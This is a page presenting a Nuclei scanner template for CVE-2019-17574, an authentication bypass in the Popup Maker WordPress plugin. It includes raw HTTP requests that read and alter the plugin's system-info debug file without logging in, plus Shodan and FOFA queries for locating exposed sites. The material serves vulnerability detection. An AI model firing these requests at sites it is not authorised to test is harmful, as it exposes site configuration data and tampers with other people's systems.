Popup-Maker < 1.8.12 - Broken Authentication

ID: CVE-2019-17574

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic

Description

An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the “support debug text file”).

YAML Source

id: CVE-2019-17574

info:
  name: Popup-Maker < 1.8.12 - Broken Authentication
  author: DhiyaneshDK
  severity: critical
  description: |
    An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the "support debug text file").
  impact: |
    Unauthenticated attackers can gain administrative access to the WordPress site.
  remediation: |
    Update Popup-Maker plugin to version 1.8.12 or later.
  reference:
    - https://wpscan.com/vulnerability/9907
    - https://web.archive.org/web/20191128065954/https://blog.redyops.com/wordpress-plugin-popup-maker/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17574
    - https://github.com/PopupMaker/Popup-Maker/blob/master/CHANGELOG.md
    - https://wpvulndb.com/vulnerabilities/9907
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: 'CVE-2019-17574'
    cwe-id: CWE-639
    epss-score: 0.11202
    epss-percentile: 0.95166
    cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: code-atlantic
    product: popup_maker
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/popup-maker/
    fofa-query: body=/wp-content/plugins/popup-maker/
    publicwww-query: "/wp-content/plugins/popup-maker/"
  tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic

http:
  - raw:
      - |
        GET /?pum_action=tools_page_tab_system_info HTTP/1.1
        Host: {{Hostname}}
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Popup Maker Configuration'
          - 'Webserver Configuration'
        condition: and

      - type: word
        part: body_2
        words:
          - 'CVE-2019-17574'
# digest: 4b0a00483046022100d045db89596b16ab2e696e15c778236fc69b46840b3090023aa2d00cf305c9ce022100906eab9f8c1c0df8e705ba9a7551f939a26fb6fab2575d381f1df4a32cb7117d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17574.yaml"

View on Github